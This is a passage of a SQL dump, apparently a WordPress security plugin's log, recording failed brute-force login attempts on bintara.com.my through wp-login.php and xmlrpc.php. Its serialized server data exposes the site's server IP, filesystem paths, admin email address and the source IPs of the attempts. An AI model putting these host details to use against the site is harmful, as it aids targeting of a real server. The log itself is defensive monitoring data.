09:15:40',17744768,19229552,'https://bintara.com.my/wp-login.php',1,0,'150.95.52.70'),(24483,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"150.95.52.70\";s:11:\"REMOTE_PORT\";s:5:\"44528\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCkO7Ip53uPsY7BKArnpAAAAEQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568711740.3435\";s:12:\"REQUEST_TIME\";s:10:\"1568711740\";}}','notice','2019-09-17 09:15:44','2019-09-17 09:15:40',17906840,19229552,'https://bintara.com.my/wp-login.php',1,0,'150.95.52.70'),(24484,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"150.95.52.70\";s:11:\"REMOTE_PORT\";s:5:\"46476\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCkQNK-omY048@iBsNL2QAAAMw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568711746.3661\";s:12:\"REQUEST_TIME\";s:10:\"1568711746\";}}','notice','2019-09-17 09:15:47','2019-09-17 09:15:46',18256224,19555000,'https://bintara.com.my/xmlrpc.php',1,0,'150.95.52.70'),(24485,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"41.242.1.163\";s:11:\"REMOTE_PORT\";s:5:\"50292\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCl8JS9022wVwVSW95@PAAAABc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568712176.2569\";s:12:\"REQUEST_TIME\";s:10:\"1568712176\";}}','notice','2019-09-17 09:22:57','2019-09-17 09:22:56',17739960,19230488,'https://bintara.com.my/wp-login.php',1,0,'41.242.1.163'),(24486,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"41.242.1.163\";s:11:\"REMOTE_PORT\";s:5:\"51210\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCl89K-omY048@iBsNMmwAAANY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568712179.7409\";s:12:\"REQUEST_TIME\";s:10:\"1568712179\";}}','notice','2019-09-17 09:23:01','2019-09-17 09:23:00',18256664,19557504,'https://bintara.com.my/xmlrpc.php',1,0,'41.242.1.163'),(24487,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.126.104\";s:11:\"REMOTE_PORT\";s:5:\"46034\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCn1NK-omY048@iBsNNMwAAAMI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568712660.5296\";s:12:\"REQUEST_TIME\";s:10:\"1568712660\";}}','notice','2019-09-17 09:31:03','2019-09-17 09:31:00',17830704,19321800,'https://bintara.com.my/wp-login.php',1,0,'162.144.126.104'),(24488,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.126.104\";s:11:\"REMOTE_PORT\";s:5:\"47272\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCn2ZS9022wVwVSW95-rwAAAAg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568712665.2198\";s:12:\"REQUEST_TIME\";s:10:\"1568712665\";}}','notice','2019-09-17 09:31:07','2019-09-17 09:31:05',18255280,19554424,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.126.104'),(24489,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"134.209.5.43\";s:11:\"REMOTE_PORT\";s:5:\"40556\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCrmpS9022wVwVSW96DawAAAAg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568713626.6857\";s:12:\"REQUEST_TIME\";s:10:\"1568713626\";}}','notice','2019-09-17 09:47:08','2019-09-17 09:47:07',17742752,19227872,'https://bintara.com.my/wp-login.php',1,0,'134.209.5.43'),(24490,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"134.209.5.43\";s:11:\"REMOTE_PORT\";s:5:\"40556\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCrmpS9022wVwVSW96DawAAAAg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568713626.6857\";s:12:\"REQUEST_TIME\";s:10:\"1568713626\";}}','notice','2019-09-17 09:47:08','2019-09-17 09:47:07',17903432,19227872,'https://bintara.com.my/wp-login.php',1,0,'134.209.5.43'),(24491,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"134.209.5.43\";s:11:\"REMOTE_PORT\";s:5:\"41414\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCrntK-omY048@iBsNPIwAAAM8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568713630.6609\";s:12:\"REQUEST_TIME\";s:10:\"1568713630\";}}','notice','2019-09-17 09:47:12','2019-09-17 